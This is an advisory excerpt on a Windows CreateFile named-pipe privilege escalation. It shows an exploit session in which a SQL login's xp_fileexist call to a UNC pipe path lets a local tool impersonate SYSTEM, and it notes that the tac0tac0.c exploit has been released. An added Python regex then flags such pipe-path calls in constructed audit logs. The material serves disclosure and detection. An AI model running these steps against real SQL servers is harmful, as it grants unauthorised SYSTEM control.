Microsoft Windows CreateFile API Named Pipe Privilege Escalation Vulnerability
    C:\>mssqlpipe.exe cmd.exe
    Creating pipe: \\.\Pipe\atstake
    Pipe created, waiting for connectection
    Connect to the database (with isql for example) and execute:
    xp_fileexist '\\SERVERNAME\pipe\atsstake'

Then in command shell #2:

    C:\>isql -U andreas
    Password:
    1> xp_fileexist '\\TEMP123\pipe\atstake'
    2> go
    File Exists File is a Directory Parent Directory Exists
    ----------- ------------------- -----------------------
    1           0                   1

Then, back in command shell #1:

    Impersonate user successful, we are running as user: SYSTEM

A functional version of the tac0tac0.c exploit has been released. The developer of the exploit has advised users to build the exploit in Release mode (and not Debug mode).
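
The xp_fileexist call in the session above leaves a recognizable trace in SQL statement logs: a quoted \\host\pipe\name argument. The Python below is an added detection example, not part of the original advisory or of the exploit; the log layout (timestamp, login=, stmt=) and the sample lines are constructed, and the match is generalized from xp_fileexist to any statement that passes such a path.

```python
import re

# Quoted UNC path whose first component after the host is "pipe",
# such as the argument in the session above. Either slash direction
# and either quote character is accepted; matching is case-insensitive.
PIPE_UNC = re.compile(
    r"""['"]\s*[\\/]{2}(?P<host>[^\\/'"\s]+)[\\/]pipe[\\/](?P<pipe>[^'"]+?)\s*['"]""",
    re.IGNORECASE,
)

# Assumed (hypothetical) audit layout: "<timestamp> login=<name> stmt=<sql text>"
LINE = re.compile(r"^(?P<ts>\S+)\s+login=(?P<login>\S+)\s+stmt=(?P<stmt>.*)$")

# Constructed sample lines, not real logs.
SAMPLE_LOG = r"""
2000-01-01T10:15:02 login=andreas stmt=xp_fileexist '\\TEMP123\pipe\atstake'
2000-01-01T10:15:09 login=report stmt=xp_fileexist 'C:\backup\db.bak'
2000-01-01T10:16:40 login=andreas stmt=EXEC master..XP_FILEEXIST "//temp123/PIPE/atstake"
2000-01-01T10:17:01 login=etl stmt=xp_fileexist '\\FILESRV\share\pipe\data.csv'
2000-01-01T10:17:30 login=app stmt=SELECT name FROM pipes WHERE id = 1
""".strip().splitlines()


def find_pipe_unc_calls(lines):
    """Return (login, host, pipe) for each statement passing a UNC named-pipe path."""
    hits = []
    for raw in lines:
        record = LINE.match(raw)
        if not record:
            continue  # not an audit record in the assumed layout
        for path in PIPE_UNC.finditer(record.group("stmt")):
            hits.append(
                (record.group("login"), path.group("host").upper(), path.group("pipe"))
            )
    return hits


if __name__ == "__main__":
    # Ordinary file paths and a share directory that merely happens to be
    # called "pipe" are not reported; only \\host\pipe\... arguments are.
    for login, host, pipe in find_pipe_unc_calls(SAMPLE_LOG):
        print(f"login {login} passed named pipe {pipe!r} on host {host}")
```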